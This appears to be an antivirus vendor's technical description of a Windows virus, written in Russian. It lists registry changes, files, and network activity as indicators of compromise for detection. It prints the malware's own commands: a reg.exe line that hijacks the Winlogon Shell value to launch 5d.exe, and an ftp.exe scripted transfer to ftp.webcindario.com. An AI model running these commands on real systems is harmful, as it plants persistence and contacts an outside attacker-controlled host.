Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] 'Shell' = 'explorer.exe <SYSTEM32>\5d.exe'
- <SYSTEM32>\ftp.exe -s:%WINDIR%\transfer.txt ftp.webcindario.com
- <SYSTEM32>\reg.exe add hklm\software\microsoft\windows" "NT\currentversion\winlogon /v Shell /t REG_SZ /d explorer.exe" "<SYSTEM32>\5d.exe /f
- %WINDIR%\explorer.exe <Текущая директория><Имя вируса>
- %WINDIR%\transfer.txt
- <SYSTEM32>\5d.exe
- 'localhost':1038
- 'ft#.##bcindario.com':21
- DNS ASK ft#.##bcindario.com
- '<IP-адрес в локальной сети>':1036